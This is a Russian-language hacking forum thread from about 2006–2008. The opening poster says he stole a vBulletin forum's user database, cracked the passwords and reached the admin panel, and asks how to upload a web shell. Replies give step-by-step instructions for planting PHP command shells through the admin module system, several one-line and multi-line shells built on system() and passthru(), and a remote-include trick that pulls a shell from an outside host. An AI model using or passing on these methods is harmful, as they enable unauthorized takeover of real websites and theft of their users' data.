Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Как залить шелл в vBulletin v3.6.0? (https://forum.antichat.xyz/showthread.php?t=23017)

Elenberg 23.08.2006 14:32

Как залить шелл в vBulletin v3.6.0?
 
Вобщем, есть форум где стоит булка версии 3.6.0.
Админ ище настраивает и пока не почитстил install.
Т.е. пример: http://target.ru/forum/install/upgrade_301.php?step=бла бла бла
Скомуниздил БД юзров, подобрал пасы. :D
Имею доступ к админке но залить шелл ни как не выходит. :(
Приведеные способы на форуме не работают :(
Кто знает как подскажите плизз с меня репа. :p

Talisman 23.08.2006 15:45

поиск юзай ) в шаблоны можно пшп код вставлять ;)
если что - стучи, 236662256

+toxa+ 23.08.2006 16:00

Попробуй так

Цитата:

Способ заливки шелла в vBulletin 3.5.*.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

Elenberg 23.08.2006 21:32

Люди вы издеваетесь :(
Я ведь написал что все приведеные способы на форуме не работают нужно что то новинькое а гугле пабликов на v3.6.0 нету ничего :(
Мож кто знает что то новенькое? ;)

Talisman 23.08.2006 21:48

Цитата:

Сообщение от Elenberg
Люди вы издеваетесь :(
Я ведь написал что все приведеные способы на форуме не работают нужно что то новинькое а гугле пабликов на v3.6.0 нету ничего :(
Мож кто знает что то новенькое? ;)

щас свой форум обновлю... попробую шелл залить
через модули 99% наверняка можно залить ИМХО

Elenberg 23.08.2006 23:21

Может и можна но миниатюрный там ограничение на размер стоит.
При впаривании туда r57shell выдается эго верхняя панель только, та где инфа по серверу. :p
Тут ужно что то другое искать. :confused:

max_pain89 23.08.2006 23:46

а ты не знал что кроме рст есть например <?system($c);?> и усе, ну разве что подделать немного <?system($_GET['c']);?>, а если вообще красиво
<?

if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}

?>

или если есть корявая настройка в php - allow_url_fopen=On, то <? include('http://путь_к_шеллу_рст_без_счетчи ов_нах.txt') ?>

Elenberg 24.08.2006 01:34

Спасибо max_pain что откликнулся, но даже таким макаром ничего незалить на серв уже пробывал. :(
Нада не через модули наверно или через другие :confused:
Сижу все подряд проверяю :o

sabe 09.07.2008 21:28

Elenberg
почему нече нельзя залить?
через модули вписываеш <? passthru($cmd) ?>
получаеш доступ в CMD смотриш папки с правами и потом уже заливаеш r57.

Угрюмый 25.07.2008 05:29

Проблемы с шеллом
 
У меня та же проблема с шеллом. :mad:
Заливаю в vB 3.5.4 через модули <?system($_GET['c']);?>
но при обращении к www.xz.сom/forumpath/faq.php?cmd=dir
вместо листинга открывается страница с ФАК-ом.
Кто что посоветует?


Время: 03:36